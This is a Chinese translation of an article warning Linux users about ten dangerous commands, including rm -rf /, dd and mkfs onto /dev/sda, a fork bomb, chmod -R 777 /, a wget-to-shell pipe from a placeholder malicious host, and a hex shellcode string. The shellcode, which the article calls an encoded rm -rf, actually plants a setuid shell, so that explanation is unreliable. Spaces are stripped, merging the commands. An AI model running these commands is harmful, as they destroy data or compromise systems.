最危险的Linux命令是什么?我被问过无数次这个问题,但我一直避免回答这个问题,因为没有一份明确的危险Linux命令列表。您拥有使您能够控制和修改操作系统的各个方面的工具。我并不是要吓唬你,但如果你不熟悉这些命令和工具,你很容易让你的系统崩溃。想象一下家里有小孩的情况。孩子伤害自己的方式有很多种。但这是否意味着不应该让孩子离开婴儿床?那对她的发展是不利的。这是父母设定界限并引导孩子的地方。远离火源,用手指戳电源插座……随着孩子的成长和经验的积累,她可以打开炉子,在壁炉里生火,然后插上电源线。同样,如果您知道一些已知有风险的命令,您可能会避免落入试图诱骗您运行会扰乱您系统的命令的巨魔的陷阱。当您获得经验并了解这些命令和工具的含义和用法时,使用愚蠢和棘手的命令破坏系统的机会就会减少。我的同事Sreenath收集了一些流行但危险的Linux命令。让我们看看它们如何杀死您的Linux系统。免责声明:如果您不知道自己在做什么,请不要尝试本文中提到的这些命令,否则后果自负。1.rm-rf/*这可能是各种社交媒体上最臭名昭著的命令。你会经常发现喷子在各种讨论中提到这一点。rm命令用于删除文件/目录。标志-r和-f递归地删除指定目录中的所有文件。现在,没有root权限,这个命令不会造成任何伤害。运行sudorm-rf/命令也不会导致任何问题,因为大多数发行版都提供了故障保护选项。您需要指定--no-preserve-root才能实际运行它。sudorm-rf/--no-preserve-root然而,一个更简单的版本可以是这样的:sudorm-rf/*它将开始递归删除根目录中的所有文件,过了一会儿,你的系统冻结并出现“错误删除文件”。重新启动后,您将被发送到grub-rescue提示符。2.覆盖你的分区如果你熟悉文件系统,你可能知道/dev/sda是什么。它(通常)是您的磁盘驱动器分区。>运算符用于将其前面的命令的输出写入提供的指定位置。一旦你运行任何命令并将其写入/dev/sda,说:echo"Hello">/dev/sda这将用所有数据的分区替换你的Hello字符串。3.把所有东西都移到一个黑洞每个Linux系统都有一个黑洞。而这个黑洞就是/dev/null。你扔进这个区域的任何东西都会永远丢失。此外,它在删除数据后报告写入过程成功,这是其破坏性的主要原因。mv/home/user/*/dev/nullmv命令用于移动或重命名文件/目录。在上面的命令中,您将主目录中的所有文件都移到了黑洞中。虽然根系统没有受到损害,但您的所有个人数据都将丢失。4.格式化硬盘mkfs是一个用于格式化磁盘和分区的命令行工具。这是一个超级方便的工具,可以为已安装的操作系统创建分区。但同样的命令也可以格式化你的硬盘。格式化您的驱动器意味着删除系统启动所需的所有文件。命令mkfs.ext3/dev/sda完成它的工作,你最终得到一个不可恢复的混乱系统。5.ForkBomb这种看起来很可爱的特殊字符和符号的随机组合足以通过耗尽系统资源来冻结正在运行的系统。:(){:|:&};:&-Shell后台运算符。它告诉shell将命令置于后台。在这里,它定义了一个名为:的函数,它调用自己两次,一次在前台,一次在后台。这个过程不断重复,直到系统冻结。顾名思义,它会自行分叉并最终成为一个吞噬所有系统资源的链式炸弹。您将被迫重新启动系统,这并不像此列表中的其他命令那么糟糕。6.覆盖重要的配置文件虽然这本身不是一个命令,但它更像是一种预防性的东西。如上所述,>运算符用于写入文件。它丢弃文件中已有的内容,并将提供的新数据写入文件。command>config_filename现在,如果你把一些重要的配置文件作为写入数据的地方,它将被内容替换,留下一个损坏的系统。7.用垃圾数据替换分区/dev/random是Linux中可以创建垃圾数据的命令。将它与dd命令和你的分区结合起来,你就有了燃烧弹可以点燃你的分区。ddif=/dev/randomof=/dev/sdadd命令用作低级复制工具。在这里,它从/dev/random中获取随机数据,并用这些垃圾替换/dev/sda分区。类似的效果是通过:cat/dev/urandom>filename这里是从/dev/urandom(LCTT译注:在Linux上,/dev/urandomnowand/dev/random)获取垃圾数据到一个文件中。如果不使用Ctrl+C终止,此文件可能会占用大量空间,这对于低端系统来说可能是灾难性的。8.向所有人公开你的系统在Linux中,一切都是文件,每个文件都有一定的权限。您可以使用ls-l检查权限。根文件系统不允许其他用户未经许可访问。虽然这可以保持系统的私密性和安全性,但您可以使用一个命令来破坏该系统。chmod-R777/上面的命令将根分区上的所有文件公开给所有人。这意味着使用该系统的每个人都具有读取、写入和执行权限。这对您的系统不利。9.下载并运行恶意内容如何在Linux中安装软件?你可以使用官方的包管理器或现成的包,如Deb/RPM、Snap、Flatpak等。但是,有些软件没有打包,它们的开发者提供了shell脚本来下载和运行。以Homebrew为例:您下载一个shell文件并以root身份运行它以在您的系统上安装一个软件。你看到问题了吗?虽然它可以与Homebrew等官方软件一起使用,但您应该在直接运行之前仔细检查下载的shell脚本的内容,如下所示:wgethttp://malicious_source-O-|在您的系统中下载并运行恶意脚本,这可能会危及您的系统安全。10.变相命令在Linux终端中运行命令的方式有很多种。其中之一是十六进制编码的命令:虽然它看起来很花哨,但这是rm-rf命令的编码版本。它与运行上一个命令具有相同的效果。因此,从互联网上复制和粘贴这些花哨的命令时要小心。charesp[]__attribute__((section(“.text”)))/*e.s.p版本*/=“\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7""\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56""\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31""\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69""\x6e\x2f\x73\x68\x00\x2d\x63\x00""cp-p/bin/sh/tmp/.beyond;chmod4755/tmp/.beyond;”;总结pebkac有一个著名的计算机术语PEBKAC:“problemexistsbetweenkeyboardandchair”。因为归根结底,由用户(您)来确保您不会通过盲目运行任何危险命令来破坏系统。阻止您搬起石头砸自己的脚不是UNIX的职责。如果您选择这样做,那么UNIX的工作就是以它知道的最有效方式将石头砸在脚上。这同样适用于Linux。您可以完全控制您的操作系统。你选择做什么完全取决于你。我建议做这些事情以获得更安全的体验。尝试并理解您将要运行的命令。使用Timeshift备份您的系统设置使用DejaDup备份您的个人数据(主目录)正如我所说,没有固定的危险Linux命令列表。可以添加到此列表中的还有很多,而且没有尽头。我希望这能给你一些提示,让你知道为了保证Linux的安全不要做什么。
